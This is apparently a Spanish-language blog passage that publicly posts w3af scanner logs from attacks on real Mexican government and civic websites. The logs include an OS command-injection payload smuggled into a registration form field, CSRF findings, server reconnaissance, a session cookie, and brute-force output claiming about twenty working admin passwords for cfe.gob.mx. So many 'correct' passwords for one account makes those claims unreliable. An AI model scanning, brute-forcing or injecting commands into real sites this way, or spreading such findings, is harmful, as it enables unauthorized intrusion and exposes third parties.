[Wed 25 May 2011 03:45:43 PM CDT] A possible OS Commanding was found at: "http://www.iniciativamexico.org/registro_corto", using HTTP method POST. The sent post-data was: "...data[usuario][mail1]=&&ping -n 3 localhost..."Please review manually. This information was found in the request with id 5175.
[Wed 25 May 2011 03:45:46 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 03:45:48 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 03:45:49 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 03:46:56 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 03:47:11 PM CDT] The "passwordProfiling" plugin took more than 5 seconds to run. For a plugin that should only perform pattern matching, this is too much, please review its source code.
[Wed 25 May 2011 03:50:40 PM CDT] The "passwordProfiling" plugin took more than 5 seconds to run. For a plugin that should only perform pattern matching, this is too much, please review its source code.
[Wed 25 May 2011 03:50:42 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 03:51:01 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 03:51:07 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 03:51:21 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 03:51:24 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 03:51:47 PM CDT] The length of both pages are zero. Cant work with this.
[Wed 25 May 2011 03:51:57 PM CDT] The length of both pages are zero. Cant work with this.
[Wed 25 May 2011 03:56:48 PM CDT] The length of both pages are zero. Cant work with this.
[Wed 25 May 2011 03:57:43 PM CDT] Too many retries (2) while requesting: http://www.iniciativamexico.org/registro_corto
[Wed 25 May 2011 03:58:13 PM CDT] Too many retries (2) while requesting: http://www.iniciativamexico.org/registro_corto
[Wed 25 May 2011 04:10:46 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 04:10:50 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 04:10:52 PM CDT] Password profiling TOP 100:
[Wed 25 May 2011 04:10:52 PM CDT] - [1] Iniciativa with 1798 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [2] participar with 1794 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [3] case with 1495 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [4] INICIATIVA with 1495 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [5] Porque with 1495 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [6] proyectos with 1200 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [7] ideas with 897 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [8] mexicano with 897 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [9] Registro with 897 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [10] Agosto with 897 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [11] proyecto with 897 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [12] cultura with 606 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [13] naturales with 606 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [14] empresas with 598 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [15] necesitas with 598 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [16] gran with 598 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [17] idea with 598 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [18] semifinalistas with 598 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [19] finales with 598 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [20] como with 598 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [21] ahora with 598 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [22] iniciativas with 598 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [23] Registra with 598 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [24] medios with 598 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [25] Cobertura with 598 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [26] comunidades with 598 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [27] Conoce with 598 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [28] impacto with 598 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [29] Julio with 598 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [30] Consejo with 598 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [31] Informativa with 598 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [32] Existen with 360 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [33] errores with 360 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [34] formulario with 360 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [35] salud with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [36] agua with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [37] cultural with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [38] Derechos with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [39] derechos with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [40] Preguntas with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [41] basura with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [42] democracia with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [43] Todos with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [44] actividad with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [45] desastres with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [46] especies with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [47] transparencia with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [48] Frecuentes with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [49] identidad with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [50] Contacto with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [51] aprendizaje with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [52] legalidad with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [53] ciencia with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [54] justicia with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [55] arte with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [56] reciclaje with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [57] familia with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [58] vivienda with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [59] adicciones with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [60] Privacidad with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [61] servicios with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [62] cuidado with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [63] fuentes with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [64] seguridad with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [65] empleo with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [66] equidad with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [67] productivos with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [68] infancia with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [69] juventud with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [70] espacios with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [71] transporte with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [72] cambio with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [73] escasez with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [74] libre with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [75] manera with 299 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [76] Junio with 299 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [77] tener with 299 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [78] Bases with 299 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [79] Museo with 299 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [80] primer with 299 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [81] nuestro with 299 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [82] mejores with 299 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [83] separados with 299 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [84] vida with 299 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [85] Programas with 299 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [86] requiere with 299 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [87] requisitos with 299 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [88] buscas with 299 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [89] quieres with 299 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [90] return with 299 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [91] fortalecer with 299 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [92] Ventures with 299 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [93] Proyectos with 299 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [94] previo with 299 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [95] Resultados with 299 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [96] Importantes with 299 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [97] mucho with 299 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [98] forman with 299 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [99] ejemplares with 299 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [100] consentimiento with 299 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] The cookie: "CAKEPHP=g5i4raul0ohnendqo9k10d5ap6; expires=Mon, 30-Jan-2012 20:27:24 GMT; path=/" was sent by these URLs:
[Wed 25 May 2011 04:10:52 PM CDT] - http://www.iniciativamexico.org/
[Wed 25 May 2011 04:10:52 PM CDT] Finished scanning process.

osCommanding

A possible OS Commanding was found at: "http://www.iniciativamexico.org/registro_corto", using HTTP method POST. The sent post-data was: "...data[usuario][mail1]=&&ping -n 3 localhost..."Please review manually. This information was found in the request with id 5175.

GET http://www.iniciativamexico.org/ HTTP/1.1
Accept-encoding: identity
Accept: */*
User-agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; w3af.sf.net)
Host: www.iniciativamexico.org
Cookie: CAKEPHP=g5i4raul0ohnendqo9k10d5ap6
Content-type: application/x-www-form-urlencoded

xsrf

posr_xsrf

Cross Site request forgery vulnerabilidad

The URL: http://www.iniciativamexico.org/registro_corto is vulnerable to cross site request forgery. It allows the attacker to exchange the method from POST to GET when sending data to the server.

The URL: http://www.iniciativamexico.org/save_invitacion is vulnerable to cross site request forgery. It allows the attacker to exchange the method from POST to GET when sending data to the server.

Aqui les dejo un video http://www.youtube.com/watch?v=CiXEFD-cTnw&feature=player_embedded

Hay Se las dejo.

Saludos Mundo Libre

Cross Site request forgery Vulnerabilidad

Saludos Mundo Libre.

He aqui posible vulnerabilidad en shcp.

http://www.shcp.gob.mx/Paginas/defaul.aspx

[Wed 25 May 2011 10:16:30 AM CDT] Auto-enabling plugin: grep.collectCookies

[Wed 25 May 2011 10:16:30 AM CDT] Auto-enabling plugin: grep.httpAuthDetect

[Wed 25 May 2011 10:16:30 AM CDT] Auto-enabling plugin: grep.error500

[Wed 25 May 2011 10:16:30 AM CDT] Auto-enabling plugin: discovery.serverHeader

[Wed 25 May 2011 10:16:30 AM CDT] Auto-enabling plugin: discovery.allowedMethods

[Wed 25 May 2011 10:16:31 AM CDT] Auto-enabling plugin: discovery.frontpage_version

[Wed 25 May 2011 10:16:31 AM CDT] Auto-enabling plugin: grep.passwordProfiling

[Wed 25 May 2011 10:16:31 AM CDT] Auto-enabling plugin: grep.getMails

[Wed 25 May 2011 10:16:31 AM CDT] Auto-enabling plugin: grep.lang

[Wed 25 May 2011 10:16:33 AM CDT] The page language is: es

[Wed 25 May 2011 10:16:33 AM CDT] The server header for the remote web server is: "Microsoft-IIS/6.0". This information was found in the request with id 15.

[Wed 25 May 2011 10:16:33 AM CDT] "x-powered-by" header for this HTTP server is: "ASP.NET". This information was found in the request with id 16.

[Wed 25 May 2011 10:16:33 AM CDT] "x-aspnet-version" header for this HTTP server is: "2.0.50727". This information was found in the request with id 16.

[Wed 25 May 2011 10:16:34 AM CDT] The resource: "http://www.shcp.gob.mx/Paginas/" requires authentication. The realm is: "NTLM". This information was found in the request with id 17.

[Wed 25 May 2011 10:16:46 AM CDT] The FrontPage Configuration Information file was found at: "http://www.shcp.gob.mx/_vti_inf.html" and the version of FrontPage Server Extensions is: "12.0.0.000". This information was found in the request with id 66.

[Wed 25 May 2011 10:16:46 AM CDT] The FPAdminScriptUrl is at: "_vti_bin/_vti_adm/admin.dll" instead of the default location: "_vti_bin/_vti_adm/admin.exe". This information was found in the request with id 66.

[Wed 25 May 2011 10:16:46 AM CDT] The FPAuthorScriptUrl is at: "_vti_bin/_vti_aut/author.dll" instead of the default location: "/_vti_bin/_vti_adm/author.exe". This information was found in the request with id 66.

[Wed 25 May 2011 10:16:46 AM CDT] New URL found by frontpage_version plugin: http://www.shcp.gob.mx/_vti_inf.html

[Wed 25 May 2011 10:16:46 AM CDT] Starting formAuthBrute plugin execution.

[Wed 25 May 2011 10:16:46 AM CDT] Starting basicAuthBrute plugin execution.

[Wed 25 May 2011 10:16:46 AM CDT] Starting basic authentication bruteforce on URL: "http://www.shcp.gob.mx/Paginas/".

[Wed 25 May 2011 10:16:57 AM CDT] No more user/password combinations available.

[Wed 25 May 2011 10:29:16 AM CDT] Found 3 URLs and 3 different points of injection.

[Wed 25 May 2011 10:29:16 AM CDT] The list of URLs is:

[Wed 25 May 2011 10:29:16 AM CDT] - http://www.shcp.gob.mx/Paginas/defaul.aspx

[Wed 25 May 2011 10:29:16 AM CDT] - http://www.shcp.gob.mx/_layouts/error.aspx

[Wed 25 May 2011 10:29:16 AM CDT] - http://www.shcp.gob.mx/_vti_inf.html

[Wed 25 May 2011 10:29:16 AM CDT] The list of fuzzable requests is:

[Wed 25 May 2011 10:29:16 AM CDT] - http://www.shcp.gob.mx/Paginas/defaul.aspx | Method: GET

[Wed 25 May 2011 10:29:16 AM CDT] - http://www.shcp.gob.mx/_layouts/error.aspx | Method: POST | Parameters: (__spDummyText2="", __VIEWSTATE="/wEPDwUKLT...", __spDummyText1="")

[Wed 25 May 2011 10:29:16 AM CDT] - http://www.shcp.gob.mx/_vti_inf.html | Method: GET

[Wed 25 May 2011 10:29:17 AM CDT] The resource: "http://www.shcp.gob.mx/_layouts/error.aspx" requires authentication. The realm is: "NTLM". This information was found in the request with id 11797.

[Wed 25 May 2011 10:29:17 AM CDT] The web application sent a persistent cookie.

[Wed 25 May 2011 10:29:17 AM CDT] The following scripts allow an attacker to send POST data as query string data (this makes XSRF easier to exploit):

[Wed 25 May 2011 10:29:17 AM CDT] - The URL: http://www.shcp.gob.mx/_layouts/error.aspx is vulnerable to cross site request forgery. It allows the attacker to exchange the method from POST to GET when sending data to the server.

[Wed 25 May 2011 10:29:24 AM CDT] The URL: http://www.shcp.gob.mx/_layouts/error.aspx is vulnerable to cross site request forgery. It allows the attacker to exchange the method from POST to GET when sending data to the server.

[Wed 25 May 2011 10:29:24 AM CDT] The FrontPage Configuration Information file was found at: "http://www.shcp.gob.mx/_vti_inf.html" and the version of FrontPage Server Extensions is: "12.0.0.000". This information was found in the request with id 66.

[Wed 25 May 2011 10:29:24 AM CDT] "x-powered-by" header for this HTTP server is: "ASP.NET". This information was found in the request with id 16.

[Wed 25 May 2011 10:29:24 AM CDT] The resource: "http://www.shcp.gob.mx/Paginas/" requires authentication. The realm is: "NTLM". This information was found in the request with id 17.

[Wed 25 May 2011 10:29:24 AM CDT] The resource: "http://www.shcp.gob.mx/_layouts/error.aspx" requires authentication. The realm is: "NTLM". This information was found in the request with id 11797.

[Wed 25 May 2011 10:29:24 AM CDT] The URL: "http://www.shcp.gob.mx/Paginas/defaul.aspx" sent the cookie: "ASP.NET_SessionId=xisilge3lt2l0a45byyqt3ur; path=/; HttpOnly". This information was found in the request with id 1.

[Wed 25 May 2011 10:29:48 AM CDT] The resource: "http://www.shcp.gob.mx/Paginas/GKVFE" requires authentication. The realm is: "NTLM". This information was found in the request with id 11947.

[Wed 25 May 2011 10:29:51 AM CDT] The resource: "http://www.shcp.gob.mx/qmvDP" requires authentication. The realm is: "NTLM". This information was found in the request with id 11955.

[Wed 25 May 2011 10:29:52 AM CDT] The resource: "http://www.shcp.gob.mx/" requires authentication. The realm is: "NTLM". This information was found in the request with id 11957.

[Wed 25 May 2011 10:30:25 AM CDT] Password profiling TOP 100:

[Wed 25 May 2011 10:30:25 AM CDT] - [1] gearPage with 4 repetitions.

[Wed 25 May 2011 10:30:25 AM CDT] - [2] este with 4 repetitions.

[Wed 25 May 2011 10:30:25 AM CDT] - [3] esta with 4 repetitions.

[Wed 25 May 2011 10:30:25 AM CDT] - [4] Windows with 4 repetitions.

[Wed 25 May 2011 10:30:25 AM CDT] - [5] SharePoint with 4 repetitions.

[Wed 25 May 2011 10:30:25 AM CDT] - [6] Volver with 4 repetitions.

[Wed 25 May 2011 10:30:25 AM CDT] - [7] problemas with 4 repetitions.

[Wed 25 May 2011 10:30:25 AM CDT] - [8] sitio with 4 repetitions.

[Wed 25 May 2011 10:30:25 AM CDT] - [9] agregado with 4 repetitions.

[Wed 25 May 2011 10:30:25 AM CDT] - [10] elemento with 4 repetitions.

[Wed 25 May 2011 10:30:25 AM CDT] - [11] existe with 3 repetitions.

[Wed 25 May 2011 10:30:25 AM CDT] - [12] entorno with 3 repetitions.

[Wed 25 May 2011 10:30:25 AM CDT] The URL: "http://www.shcp.gob.mx/Paginas/defaul.aspx" sent these cookies:

[Wed 25 May 2011 10:30:25 AM CDT] - ASP.NET_SessionId=xisilge3lt2l0a45byyqt3ur; Path=/

[Wed 25 May 2011 10:30:25 AM CDT] - ASP.NET_SessionId=xisilge3lt2l0a45byyqt3ur; path=/; HttpOnly

[Wed 25 May 2011 10:30:25 AM CDT] Finished scanning process.

The URL: http://www.shcp.gob.mx/_layouts/error.aspx is vulnerable to cross site request forgery. It allows the attacker to exchange the method from POST to GET when sending data to the server.

Hay selas dejo.

Saludos Mundo Libre.

martes, 24 de mayo de 2011

Vulnerabilidad en CFE

Saludos Mundo libre.

He aqui una vulnerabilidad en la web de CFE.

[Tue 24 May 2011 11:31:23 PM CDT] Auto-enabling plugin: grep.collectCookies
[Tue 24 May 2011 11:31:23 PM CDT] Auto-enabling plugin: grep.httpAuthDetect
[Tue 24 May 2011 11:31:23 PM CDT] Auto-enabling plugin: grep.error500
[Tue 24 May 2011 11:31:23 PM CDT] Auto-enabling plugin: discovery.serverHeader
[Tue 24 May 2011 11:31:23 PM CDT] Auto-enabling plugin: discovery.allowedMethods
[Tue 24 May 2011 11:31:23 PM CDT] Auto-enabling plugin: discovery.frontpage_version
[Tue 24 May 2011 11:31:23 PM CDT] Auto-enabling plugin: grep.passwordProfiling
[Tue 24 May 2011 11:31:23 PM CDT] Auto-enabling plugin: grep.getMails
[Tue 24 May 2011 11:31:24 PM CDT] Auto-enabling plugin: grep.lang
[Tue 24 May 2011 11:31:30 PM CDT] The page language is: es
[Tue 24 May 2011 11:31:31 PM CDT] The server header for the remote web server is: "Microsoft-IIS/6.0". This information was found in the request with id 18.
[Tue 24 May 2011 11:31:31 PM CDT] "x-powered-by" header for this HTTP server is: "ASP.NET". This information was found in the request with id 20.
[Tue 24 May 2011 11:31:31 PM CDT] "x-aspnet-version" header for this HTTP server is: "2.0.50727". This information was found in the request with id 20.
[Tue 24 May 2011 11:31:31 PM CDT] The resource: "http://www.cfe.gob.mx/" requires authentication. The realm is: "NTLM". This information was found in the request with id 21.
[Tue 24 May 2011 11:31:54 PM CDT] The FrontPage Configuration Information file was found at: "http://www.cfe.gob.mx/_vti_inf.html" and the version of FrontPage Server Extensions is: "12.0.0.000". This information was found in the request with id 74.
[Tue 24 May 2011 11:31:54 PM CDT] The FPAdminScriptUrl is at: "_vti_bin/_vti_adm/admin.dll" instead of the default location: "_vti_bin/_vti_adm/admin.exe". This information was found in the request with id 74.
[Tue 24 May 2011 11:31:54 PM CDT] The FPAuthorScriptUrl is at: "_vti_bin/_vti_aut/author.dll" instead of the default location: "/_vti_bin/_vti_adm/author.exe". This information was found in the request with id 74.
[Tue 24 May 2011 11:31:54 PM CDT] New URL found by frontpage_version plugin: http://www.cfe.gob.mx/_vti_inf.html
[Tue 24 May 2011 11:31:54 PM CDT] Starting formAuthBrute plugin execution.
[Tue 24 May 2011 11:31:54 PM CDT] Starting basicAuthBrute plugin execution.
[Tue 24 May 2011 11:31:54 PM CDT] Starting basic authentication bruteforce on URL: "http://www.cfe.gob.mx/".
[Tue 24 May 2011 11:31:57 PM CDT] Found authentication credentials to: "http://www.cfe.gob.mx/". A correct user and password combination is: admin/73mp123. This vulnerability was found in the request with id 95.
[Tue 24 May 2011 11:31:57 PM CDT] Found authentication credentials to: "http://www.cfe.gob.mx/". A correct user and password combination is: admin/qwerty. This vulnerability was found in the request with id 96.
[Tue 24 May 2011 11:31:57 PM CDT] Found authentication credentials to: "http://www.cfe.gob.mx/". A correct user and password combination is: admin/7emp. This vulnerability was found in the request with id 97.
[Tue 24 May 2011 11:31:57 PM CDT] Found authentication credentials to: "http://www.cfe.gob.mx/". A correct user and password combination is: admin/123abc. This vulnerability was found in the request with id 98.
[Tue 24 May 2011 11:31:57 PM CDT] Found authentication credentials to: "http://www.cfe.gob.mx/". A correct user and password combination is: admin/abcde. This vulnerability was found in the request with id 99.
[Tue 24 May 2011 11:31:58 PM CDT] Found authentication credentials to: "http://www.cfe.gob.mx/". A correct user and password combination is: admin/qazwsx. This vulnerability was found in the request with id 100.
[Tue 24 May 2011 11:31:58 PM CDT] Found authentication credentials to: "http://www.cfe.gob.mx/". A correct user and password combination is: admin/admin123. This vulnerability was found in the request with id 101.
[Tue 24 May 2011 11:31:58 PM CDT] Found authentication credentials to: "http://www.cfe.gob.mx/". A correct user and password combination is: admin/d474b453. This vulnerability was found in the request with id 105.
[Tue 24 May 2011 11:31:58 PM CDT] Found authentication credentials to: "http://www.cfe.gob.mx/". A correct user and password combination is: admin/pa55. This vulnerability was found in the request with id 103.
[Tue 24 May 2011 11:31:58 PM CDT] Found authentication credentials to: "http://www.cfe.gob.mx/". A correct user and password combination is: admin/supervisor. This vulnerability was found in the request with id 102.
[Tue 24 May 2011 11:31:58 PM CDT] Found authentication credentials to: "http://www.cfe.gob.mx/". A correct user and password combination is: admin/dragon. This vulnerability was found in the request with id 104.
[Tue 24 May 2011 11:31:58 PM CDT] Found authentication credentials to: "http://www.cfe.gob.mx/". A correct user and password combination is: admin/nopassword. This vulnerability was found in the request with id 106.
[Tue 24 May 2011 11:31:58 PM CDT] Found authentication credentials to: "http://www.cfe.gob.mx/". A correct user and password combination is: admin/4cc0un7. This vulnerability was found in the request with id 111.
[Tue 24 May 2011 11:31:59 PM CDT] Found authentication credentials to: "http://www.cfe.gob.mx/". A correct user and password combination is: admin/c0n7r0ll3r. This vulnerability was found in the request with id 112.
[Tue 24 May 2011 11:31:59 PM CDT] Found authentication credentials to: "http://www.cfe.gob.mx/". A correct user and password combination is: admin/letmein. This vulnerability was found in the request with id 109.
[Tue 24 May 2011 11:31:59 PM CDT] Found authentication credentials to: "http://www.cfe.gob.mx/". A correct user and password combination is: admin/999. This vulnerability was found in the request with id 114.
[Tue 24 May 2011 11:31:59 PM CDT] Found authentication credentials to: "http://www.cfe.gob.mx/". A correct user and password combination is: admin/codename. This vulnerability was found in the request with id 107.
[Tue 24 May 2011 11:31:59 PM CDT] Found authentication credentials to: "http://www.cfe.gob.mx/". A correct user and password combination is: admin/1111111. This vulnerability was found in the request with id 110.
[Tue 24 May 2011 11:32:00 PM CDT] Found authentication credentials to: "http://www.cfe.gob.mx/". A correct user and password combination is: admin/xxxx. This vulnerability was found in the request with id 108.
[Tue 24 May 2011 11:32:00 PM CDT] Found authentication credentials to: "http://www.cfe.gob.mx/". A correct user and password combination is: admin/55555. This vulnerability was found in the request with id 113.
[Tue 24 May 2011 11:34:05 PM CDT] Starting formAuthBrute plugin execution.
[Tue 24 May 2011 11:34:05 PM CDT] Starting basicAuthBrute plugin execution.
[Tue 24 May 2011 11:34:05 PM CDT] Found 4 URLs and 39 different points of injection.
[Tue 24 May 2011 11:34:05 PM CDT] The list of URLs is:
[Tue 24 May 2011 11:34:05 PM CDT] - http://www.cfe.gob.mx
[Tue 24 May 2011 11:34:05 PM CDT] - http://www.cfe.gob.mx/
[Tue 24 May 2011 11:34:05 PM CDT] - http://www.cfe.gob.mx/Paginas/Home.aspx
[Tue 24 May 2011 11:34:05 PM CDT] - http://www.cfe.gob.mx/_vti_inf.html
[Tue 24 May 2011 11:34:05 PM CDT] The list of fuzzable requests is:
[Tue 24 May 2011 11:34:05 PM CDT] - http://www.cfe.gob.mx | Method: GET
[Tue 24 May 2011 11:34:05 PM CDT] - http://www.cfe.gob.mx/ | Method: GET
[Tue 24 May 2011 11:34:05 PM CDT] - http://www.cfe.gob.mx/Paginas/Home.aspx | Method: POST | Parameters: (ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$Password="", MSOSPWebPartManager_StartWebPartEditingName="false", __EVENTVALIDATION="/wEWSAL6k4...", MSOAuthoringConsole_FormContext="", MSOTlPn_SelectedWpId="", MSOLayout_InDesignMode="", ctl00$m$g_ecf321fd_0095_4575_a382_61939a04a28f$ctl00="1", MSOGallery_SelectedLibrary="", MSOLayout_LayoutChanges="", MSOTlPn_View="0", MSOGallery_FilterString="", MSOAC_EditDuringWorkflow="", MSOTlPn_ShowSettings="False", __SPSCEditMenu="true", ctl00_m_g_0e55e77d_1fa2_4c41_a275_b03e0c60aa77_SBD08AAFC_InputKeywords="", MSOWebPartPage_PostbackSource="", ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$UserName="", MSOTlPn_Button="none", MSOSPWebPartManager_DisplayModeName="Browse", ctl00$PlaceHolderSearchArea$ctl01$S6AE27B38_InputKeywords="", __VIEWSTATE="/wEPDwULLT...", __REQUESTDIGEST="0x986D38B9...", ctl00$PlaceHolderSearchArea$ctl01$ctl00="http://www...", ctl00$PlaceHolderSearchArea$ctl01$SBScopesDDL="", MSOWebPartPage_Shared="", MSOSPWebPartManager_OldDisplayModeName="Browse")
[Tue 24 May 2011 11:34:05 PM CDT] - http://www.cfe.gob.mx/Paginas/Home.aspx | Method: POST | Parameters: (ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$Password="", MSOSPWebPartManager_StartWebPartEditingName="false", __EVENTVALIDATION="/wEWSAL6k4...", MSOAuthoringConsole_FormContext="", MSOTlPn_SelectedWpId="", MSOLayout_InDesignMode="", ctl00$m$g_ecf321fd_0095_4575_a382_61939a04a28f$ctl00="1", MSOGallery_SelectedLibrary="", MSOLayout_LayoutChanges="", MSOTlPn_View="0", MSOGallery_FilterString="", MSOAC_EditDuringWorkflow="", MSOTlPn_ShowSettings="False", __SPSCEditMenu="true", ctl00_m_g_0e55e77d_1fa2_4c41_a275_b03e0c60aa77_SBD08AAFC_InputKeywords="", MSOWebPartPage_PostbackSource="", ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$UserName="", MSOTlPn_Button="none", MSOSPWebPartManager_DisplayModeName="Browse", ctl00$PlaceHolderSearchArea$ctl01$S6AE27B38_InputKeywords="", __VIEWSTATE="/wEPDwULLT...", __REQUESTDIGEST="0x986D38B9...", ctl00$PlaceHolderSearchArea$ctl01$ctl00="http://www...", ctl00$PlaceHolderSearchArea$ctl01$SBScopesDDL="", MSOWebPartPage_Shared="", MSOSPWebPartManager_OldDisplayModeName="Browse", ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$RememberMe="")
[Tue 24 May 2011 11:34:05 PM CDT] - http://www.cfe.gob.mx/Paginas/Home.aspx | Method: POST | Parameters: (ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$Password="", MSOSPWebPartManager_StartWebPartEditingName="false", __EVENTVALIDATION="/wEWSAL6k4...", MSOAuthoringConsole_FormContext="", MSOTlPn_SelectedWpId="", MSOLayout_InDesignMode="", ctl00$m$g_ecf321fd_0095_4575_a382_61939a04a28f$ctl00="1", MSOGallery_SelectedLibrary="", MSOLayout_LayoutChanges="", MSOTlPn_View="0", MSOGallery_FilterString="", MSOAC_EditDuringWorkflow="", MSOTlPn_ShowSettings="False", __SPSCEditMenu="true", ctl00_m_g_0e55e77d_1fa2_4c41_a275_b03e0c60aa77_SBD08AAFC_InputKeywords="", MSOWebPartPage_PostbackSource="", ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$UserName="", MSOTlPn_Button="none", MSOSPWebPartManager_DisplayModeName="Browse", 